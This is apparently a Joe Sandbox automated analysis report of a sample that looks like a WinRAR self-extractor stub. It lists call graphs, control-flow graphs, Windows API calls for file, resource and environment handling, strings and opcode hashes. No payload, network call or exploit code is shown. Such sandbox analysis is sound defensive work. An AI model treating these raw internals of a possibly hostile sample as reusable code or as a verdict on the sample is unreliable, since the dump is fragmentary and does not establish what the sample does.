26369->26370 26371 dbe0e6 26370->26371 26398 dbe240 26370->26398 26373 dbbafa _free 20 API calls 26371->26373 26375 dbe0a3 26373->26375 26375->26359 26376 dbe0e1 26408 dbbc7b 20 API calls __dosmaperr 26376->26408 26378 dbe12a 26378->26371 26409 dbdce1 26 API calls 26378->26409 26379 dbe0fe 26379->26378 26380 dbbafa _free 20 API calls 26379->26380 26380->26378 26383 dbe1aa ___scrt_is_nonwritable_in_current_image 26382->26383 26384 dbb9a5 _unexpected 38 API calls 26383->26384 26386 dbe1b4 26384->26386 26389 dbe238 _abort 26386->26389 26390 dbbafa _free 20 API calls 26386->26390 26410 dbb584 38 API calls _abort 26386->26410 26411 dbd281 EnterCriticalSection 26386->26411 26412 dbe22f LeaveCriticalSection _abort 26386->26412 26389->26366 26390->26386 26392 db6dd4 __cftof 38 API calls 26391->26392 26393 dbde1d 26392->26393 26394 dbde3e 26393->26394 26395 dbde2c GetOEMCP 26393->26395 26396 dbde43 GetACP 26394->26396 26397 dbde55 26394->26397 26395->26397 26396->26397 26397->26369 26397->26375 26399 dbde0b 40 API calls 26398->26399 26400 dbe25f 26399->26400 26403 dbe2b0 IsValidCodePage 26400->26403 26405 dbe266 26400->26405 26407 dbe2d5 __cftof 26400->26407 26401 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26402 dbe0d9 26401->26402 26402->26376 26402->26379 26404 dbe2c2 GetCPInfo 26403->26404 26403->26405 26404->26405 26404->26407 26405->26401 26413 dbdee3 GetCPInfo 26407->26413 26408->26371 26409->26371 26411->26386 26412->26386 26414 dbdfc7 26413->26414 26419 dbdf1d 26413->26419 26416 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26414->26416 26418 dbe073 26416->26418 26418->26405 26423 dbefd8 26419->26423 26422 dbd1c8 __vsnwprintf_l 43 API calls 26422->26414 26424 db6dd4 __cftof 38 API calls 26423->26424 26425 dbeff8 MultiByteToWideChar 26424->26425 26427 dbf0ce 26425->26427 26428 dbf036 26425->26428 26429 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26427->26429 26430 dbbc8e __vsnwprintf_l 21 API calls 26428->26430 26433 dbf057 __cftof __vsnwprintf_l 26428->26433 26431 dbdf7e 26429->26431 26430->26433 26437 dbd1c8 26431->26437 26432 dbf0c8 26442 dbd213 20 API calls _free 26432->26442 26433->26432 26435 dbf09c MultiByteToWideChar 26433->26435 26435->26432 26436 dbf0b8 GetStringTypeW 26435->26436 26436->26432 26438 db6dd4 __cftof 38 API calls 26437->26438 26439 dbd1db 26438->26439 26443 dbcfab 26439->26443 26442->26427 26444 dbcfc6 __vsnwprintf_l 26443->26444 26445 dbcfec MultiByteToWideChar 26444->26445 26446 dbd016 26445->26446 26457 dbd1a0 26445->26457 26449 dbbc8e __vsnwprintf_l 21 API calls 26446->26449 26453 dbd037 __vsnwprintf_l 26446->26453 26447 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26448 dbd1b3 26447->26448 26448->26422 26449->26453 26450 dbd0ec 26479 dbd213 20 API calls _free 26450->26479 26451 dbd080 MultiByteToWideChar 26451->26450 26452 dbd099 26451->26452 26470 dbd5bc 26452->26470 26453->26450 26453->26451 26457->26447 26458 dbd0fb 26462 dbbc8e __vsnwprintf_l 21 API calls 26458->26462 26465 dbd11c __vsnwprintf_l 26458->26465 26459 dbd0c3 26459->26450 26461 dbd5bc __vsnwprintf_l 11 API calls 26459->26461 26460 dbd191 26478 dbd213 20 API calls _free 26460->26478 26461->26450 26462->26465 26463 dbd5bc __vsnwprintf_l 11 API calls 26466 dbd170 26463->26466 26465->26460 26465->26463 26466->26460 26467 dbd17f WideCharToMultiByte 26466->26467 26467->26460 26468 dbd1bf 26467->26468 26480 dbd213 20 API calls _free 26468->26480 26471 dbd2e8 __dosmaperr 5 API calls 26470->26471 26472 dbd5e3 26471->26472 26475 dbd5ec 26472->26475 26481 dbd644 10 API calls 3 library calls 26472->26481 26474 dbd62c LCMapStringW 26474->26475 26476 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26475->26476 26477 dbd0b0 26476->26477 26477->26450 26477->26458 26477->26459 26478->26450 26479->26457 26480->26450 26481->26474 26594 db2580 LocalFree 26668 dad384 GetDlgItem EnableWindow ShowWindow SendMessageW 26484 d9b9ba 26485 d9b9c8 26484->26485 26486 d9b9cf 26484->26486 26487 d9b9dc GetStdHandle 26486->26487 26494 d9b9eb 26486->26494 26487->26494 26488 d9ba43 WriteFile 26488->26494 26489 d9ba0f 26490 d9ba14 WriteFile 26489->26490 26489->26494 26490->26489 26490->26494 26492 d9bad5 26496 d97e45 77 API calls 26492->26496 26494->26485 26494->26488 26494->26489 26494->26490 26494->26492 26495 d97b1e 78 API calls 26494->26495 26495->26494 26496->26485 26596 db11bf 48 API calls _unexpected 26671 d96ba0 41 API calls __EH_prolog3 26600 dacda0 73 API calls 26545 d921a5 26546 d921b8 26545->26546 26547 d921b0 26545->26547 26549 d921b6 26546->26549 26550 db121c 27 API calls 26546->26550 26551 d921ca 27 API calls Concurrency::cancel_current_task 26547->26551 26550->26549 26551->26549 26602 daf950 70 API calls 26603 dbb150 7 API calls ___scrt_uninitialize_crt 26604 db1d50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26605 dbcd50 21 API calls 26607 da3d49 7 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26677 da9740 132 API calls 26678 daea83 131 API calls 5 library calls 26679 dbdafe 27 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 26613 dae560 91 API calls 2 library calls 26681 dad361 78 API calls 26682 db531b 38 API calls 4 library calls 26339 db030b 26340 db0318 26339->26340 26341 da0597 53 API calls 26340->26341 26342 db0333 26341->26342 26343 d94c00 _swprintf 51 API calls 26342->26343 26344 db0346 SetDlgItemTextW 26343->26344 26345 dad864 5 API calls 26344->26345 26346 db0363 26345->26346 26347 db10f9 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 26346->26347 26348 db0378 26347->26348 26619 db0900 14 API calls ___delayLoadHelper2@8 26685 db1b00 46 API calls __RTC_Initialize 26620 db1d07 29 API calls _abort 26622 dbe530 GetCommandLineA GetCommandLineW 26689 db4f20 6 API calls 4 library calls

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 359 daea07-daea55 call db1590 362 daea5b-daea81 call dad5dd 359->362 363 daf717-daf739 call db10f9 359->363 368 daea83 362->368 368->363 369 daea89-daea9d 368->369 370 daea9e-daeab3 call dad148 369->370 373 daeab5 370->373 374 daeab7-daeacc call da4168 373->374 377 daead9-daeadc 374->377 378 daeace-daead2 374->378 379 daf6ea-daf712 call dad5dd 377->379 380 daeae2 377->380 378->374 381 daead4 378->381 379->368 382 daeae9-daeaec 380->382 383 daecae-daecb0 380->383 384 daed4f-daed51 380->384 385 daed6d-daed6f 380->385 381->379 382->379 390 daeaf2-daeb46 call dac5dd call d9dd18 call d9c351 call d9c48b call d97eed 382->390 383->379 389 daecb6-daecc2 383->389 384->379 387 daed57-daed68 SetWindowTextW 384->387 385->379 388 daed75-daed7c 385->388 387->379 388->379 392 daed82-daed9b 388->392 393 daecd6-daecdb 389->393 394 daecc4-daecd5 call db9f09 389->394 445 daec85-daec97 call d9c3de 390->445 396 daed9d 392->396 397 daeda3-daedb1 call db6433 392->397 400 daecdd-daece3 393->400 401 daece5-daecf0 call dad76e 393->401 394->393 396->397 397->379 414 daedb7-daedc0 397->414 405 daecf5-daecf7 400->405 401->405 407 daecf9-daed00 call db6433 405->407 408 daed02-daed22 call db6433 call db66ae 405->408 407->408 433 daed3b-daed3d 408->433 434 daed24-daed2b 408->434 418 daede9-daedec 414->418 419 daedc2-daedc6 414->419 421 daedf2-daedf5 418->421 422 daeee4-daeef2 call da268b 418->422 419->421 424 daedc8-daedd0 419->424 426 daee02-daee1d 421->426 427 daedf7-daedfc 421->427 437 daeef4-daef08 call db4b4e 422->437 424->379 429 daedd6-daede4 call da268b 424->429 446 daee7a-daee81 426->446 447 daee1f-daee5a 426->447 427->422 427->426 429->437 433->379 442 daed43-daed4a call db66a9 433->442 440 daed2d-daed2f 434->440 441 daed32-daed3a call db9f09 434->441 458 daef0a-daef0e 437->458 459 daef15-daef66 call da268b call dad41c GetDlgItem SetWindowTextW SendMessageW call db8796 437->459 440->441 441->433 442->379 462 daeb4b-daeb5f SetFileAttributesW 445->462 463 daec9d-daeca9 call d9c367 445->463 451 daeeaf-daeed2 call db6433 * 2 446->451 452 daee83-daee9b call db6433 446->452 481 daee6b 447->481 482 daee5c-daee63 447->482 451->437 486 daeed4-daeee2 call da2663 451->486 452->451 471 daee9d-daeeaa call da2663 452->471 458->459 465 daef10-daef12 458->465 498 daef6b-daef6f 459->498 468 daec05-daec15 GetFileAttributesW 462->468 469 daeb65-daeb98 call d9d8ac call d9d52f call db6433 462->469 463->379 465->459 468->445 478 daec17-daec26 DeleteFileW 468->478 506 daeb9a-daeba9 call db6433 469->506 507 daebab-daebb9 call d9dcd9 469->507 471->451 478->445 484 daec28-daec2b 478->484 489 daee70-daee72 481->489 487 daee69 482->487 488 daf73c-daf741 call db13f9 482->488 492 daec2f-daec5b call d94c00 GetFileAttributesW 484->492 486->437 487->489 489->446 504 daec2d-daec2e 492->504 505 daec5d-daec73 MoveFileW 492->505 498->379 502 daef75-daef89 SendMessageW 498->502 502->379 504->492 505->445 508 daec75-daec7f MoveFileExW 505->508 506->507 513 daebbf-daebfe call db6433 call db2640 506->513 507->463 507->513 508->445 513->468
                                                                    APIs
                                                                      • Part of subcall function 00DAD5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00DAD6C7
                                                                      • Part of subcall function 00DAC5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00DAC5E5
                                                                    • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,00000800,?,E7604376,?,00000000,00000001), ref: 00DAEB53
                                                                    • _wcslen.LIBCMT ref: 00DAEB8D
                                                                    • _wcslen.LIBCMT ref: 00DAEBA1
                                                                    • _wcslen.LIBCMT ref: 00DAEBC6
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00DAEC0C
                                                                    • DeleteFileW.KERNEL32(?), ref: 00DAEC1E
                                                                    • _swprintf.LIBCMT ref: 00DAEC43
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00DAEC52
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00DAEC6B
                                                                    • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00DAEC7F
                                                                    • _wcslen.LIBCMT ref: 00DAECFA
                                                                    • _wcslen.LIBCMT ref: 00DAED03
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DAED62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: File$_wcslen$Attributes$Move$CurrentDeleteDirectoryEnvironmentExpandStringsTextWindow_swprintf
                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                    • API String ID: 2983673336-312220925
                                                                    • Opcode ID: d8612cf614895590bd6fd7977fbf1fa7e830040f3ae1735c5bc744e65dcb2358
                                                                    • Instruction ID: 0320cf60e4f26c55f9537529f51bf39260d8ca846829e15dd036031b6c3a5e18
                                                                    • Opcode Fuzzy Hash: d8612cf614895590bd6fd7977fbf1fa7e830040f3ae1735c5bc744e65dcb2358
                                                                    • Instruction Fuzzy Hash: 3EF14072900249AADB21EFA4DC55EEF33BCEF0A710F08452AF906D7190EB749A45CB70

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00DA290A: GetModuleHandleW.KERNEL32 ref: 00DA2937
                                                                      • Part of subcall function 00DA290A: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DA2949
                                                                      • Part of subcall function 00DA290A: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DA2973
                                                                      • Part of subcall function 00DAC5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00DAC5E5
                                                                      • Part of subcall function 00DACCD9: OleInitialize.OLE32(00000000), ref: 00DACCF2
                                                                      • Part of subcall function 00DACCD9: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DACD29
                                                                      • Part of subcall function 00DACCD9: SHGetMalloc.SHELL32(00DDC460), ref: 00DACD33
                                                                    • GetCommandLineW.KERNEL32 ref: 00DB03C9
                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00DB03F3
                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 00DB0404
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00DB0455
                                                                      • Part of subcall function 00DAFFDD: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DAFFFE
                                                                      • Part of subcall function 00DAFFDD: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DB0038
                                                                      • Part of subcall function 00DA1421: _wcslen.LIBCMT ref: 00DA1445
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00DB045C
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00DF2CC0,00000800), ref: 00DB0476
                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00DF2CC0), ref: 00DB0482
                                                                    • GetLocalTime.KERNEL32(?), ref: 00DB048D
                                                                    • _swprintf.LIBCMT ref: 00DB04E1
                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00DB04F6
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00DB04FD
                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00DB0514
                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001DAE0,00000000), ref: 00DB0565
                                                                    • Sleep.KERNEL32(?), ref: 00DB0593
                                                                    • DeleteObject.GDI32 ref: 00DB05CC
                                                                    • DeleteObject.GDI32(?), ref: 00DB05DC
                                                                    • CloseHandle.KERNEL32 ref: 00DB061F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                    • API String ID: 3014515783-3710569615
                                                                    • Opcode ID: 3484421439cd38d57cae19794c39c5f14ac15e90342bf686d90cdc8f5e708357
                                                                    • Instruction ID: 90cb0ce05a6a9a927f8fcc0773a59171862bb41d70a933cf2939773dc0fdb2f4
                                                                    • Opcode Fuzzy Hash: 3484421439cd38d57cae19794c39c5f14ac15e90342bf686d90cdc8f5e708357
                                                                    • Instruction Fuzzy Hash: A671FF71500342AFD720AB65EC4AFBB7BA8EB46741F04841AF646D2392DF749948CBB1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 606 dac652-dac66f FindResourceW 607 dac76b 606->607 608 dac675-dac686 SizeofResource 606->608 609 dac76d-dac771 607->609 608->607 610 dac68c-dac69b LoadResource 608->610 610->607 611 dac6a1-dac6ac LockResource 610->611 611->607 612 dac6b2-dac6c7 GlobalAlloc 611->612 613 dac6cd-dac6d6 GlobalLock 612->613 614 dac763-dac769 612->614 615 dac75c-dac75d GlobalFree 613->615 616 dac6dc-dac6fa call db4250 613->616 614->609 615->614 620 dac6fc-dac71e call dac5b6 616->620 621 dac755-dac756 GlobalUnlock 616->621 620->621 626 dac720-dac728 620->626 621->615 627 dac72a-dac73e GdipCreateHBITMAPFromBitmap 626->627 628 dac743-dac751 626->628 627->628 629 dac740 627->629 628->621 629->628
                                                                    APIs
                                                                    • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00DADA3D,00000066), ref: 00DAC665
                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC67C
                                                                    • LoadResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC693
                                                                    • LockResource.KERNEL32(00000000,?,?,?,00DADA3D,00000066), ref: 00DAC6A2
                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00DADA3D,00000066), ref: 00DAC6BD
                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,?,00DADA3D,00000066), ref: 00DAC6CE
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00DAC756
                                                                      • Part of subcall function 00DAC5B6: GdipAlloc.GDIPLUS(00000010), ref: 00DAC5BC
                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00DAC737
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00DAC75D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                    • String ID: PNG
                                                                    • API String ID: 541704414-364855578
                                                                    • Opcode ID: a77b890ed641170f1334a30f3a56d1f5efd3bb49d4b3c9fffec339873995d3e0
                                                                    • Instruction ID: 7d521c251ff24ab50029dbaeff6192df11f3a588b1bf4a2a90405067780f2b76
                                                                    • Opcode Fuzzy Hash: a77b890ed641170f1334a30f3a56d1f5efd3bb49d4b3c9fffec339873995d3e0
                                                                    • Instruction Fuzzy Hash: 3B314C75610707ABD7119F21EC88D2BBBA8EF46B617080529F905D2261EB31D805DFB0
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,E7604376), ref: 00D9F9CD
                                                                      • Part of subcall function 00D9E208: _wcslen.LIBCMT ref: 00D9E210
                                                                      • Part of subcall function 00DA2663: _wcslen.LIBCMT ref: 00DA2669
                                                                      • Part of subcall function 00DA3D10: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,00000001,00D9DA04,00000000,?,?,0001040E,?,?), ref: 00DA3D2C
                                                                    • _wcslen.LIBCMT ref: 00D9FD00
                                                                    • __fprintf_l.LIBCMT ref: 00D9FE50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$ByteCharFileModuleMultiNameWide__fprintf_l
                                                                    • String ID: ,$$%s:$*messages***$*messages***$@%s:$RTL
                                                                    • API String ID: 2646189078-285229759
                                                                    • Opcode ID: c4595783cd95d7a828a03753f92fd508914ca0e1b275fc6093c8757da5d8c2d0
                                                                    • Instruction ID: 72f2baca840ab84429709efdaa01f12cc39ed9cfb085ecad92432d9531960fbd
                                                                    • Opcode Fuzzy Hash: c4595783cd95d7a828a03753f92fd508914ca0e1b275fc6093c8757da5d8c2d0
                                                                    • Instruction Fuzzy Hash: 7F42E271900319ABDF24DFA8C841BEE77B4FF19710F54052AE906EB281EB719A45CB74

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1048 d9c4a8-d9c4e3 call db1590 1051 d9c548-d9c551 FindNextFileW 1048->1051 1052 d9c4e5-d9c4f0 FindFirstFileW 1048->1052 1053 d9c563-d9c606 call da268b call d9e27e call da3724 * 3 1051->1053 1055 d9c553-d9c561 GetLastError 1051->1055 1052->1053 1054 d9c4f2-d9c507 call d9da1e 1052->1054 1060 d9c60b-d9c62c call db10f9 1053->1060 1063 d9c509-d9c520 FindFirstFileW 1054->1063 1064 d9c522-d9c52b GetLastError 1054->1064 1057 d9c53d-d9c543 1055->1057 1057->1060 1063->1053 1063->1064 1067 d9c53b 1064->1067 1068 d9c52d-d9c530 1064->1068 1067->1057 1068->1067 1071 d9c532-d9c535 1068->1071 1071->1067 1073 d9c537-d9c539 1071->1073 1073->1057
                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000), ref: 00D9C4E6
                                                                      • Part of subcall function 00D9DA1E: _wcslen.LIBCMT ref: 00D9DA59
                                                                    • FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?), ref: 00D9C516
                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A), ref: 00D9C522
                                                                    • FindNextFileW.KERNEL32(?,?,00000000,?,?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000), ref: 00D9C549
                                                                    • GetLastError.KERNEL32(?,?,00D9C39F,000000FF,?,?,?,?,00D987BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00D9C555
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                    • String ID:
                                                                    • API String ID: 42610566-0
                                                                    • Opcode ID: feddf7722001579b8783bc7515f43caef30ecdf123e6700ee79acd65e3d5d108
                                                                    • Instruction ID: 82411e0a6a0185caa7dcb967ba8586a069fa799a3c87bf453e47a91c5edc7ba2
                                                                    • Opcode Fuzzy Hash: feddf7722001579b8783bc7515f43caef30ecdf123e6700ee79acd65e3d5d108
                                                                    • Instruction Fuzzy Hash: 1C4152B1508346ABC724EF64D885AEAF7E8FB89350F05091EF59AD3240D734E9548BB2
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,00DBA616,?,00DCF7B0,0000000C,00DBA76D,?,00000002,00000000), ref: 00DBA661
                                                                    • TerminateProcess.KERNEL32(00000000,?,00DBA616,?,00DCF7B0,0000000C,00DBA76D,?,00000002,00000000), ref: 00DBA668
                                                                    • ExitProcess.KERNEL32 ref: 00DBA67A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 8973f280971d5072d3e12410b207671d15941b0b0cbd4ef0eac6f015871a0c0d
                                                                    • Instruction ID: 17b416b7be7cb503dd9f67fc6edee5118f1482c59ad08e0e409b30d918544441
                                                                    • Opcode Fuzzy Hash: 8973f280971d5072d3e12410b207671d15941b0b0cbd4ef0eac6f015871a0c0d
                                                                    • Instruction Fuzzy Hash: 67E0B67104060AEFCF116F68DD09E8C3B6AEB50741F084414F80A9A232DF36ED42DBB5
                                                                    Strings
                                                                    • __tmp_reference_source_, xrefs: 00D99C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                                    • Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$AttributesFile_swprintf$CurrentH_prolog3Process__aulldiv_wcsrchr
                                                                    • String ID: __tmp_reference_source_
                                                                    • API String ID: 3636405837-685763994
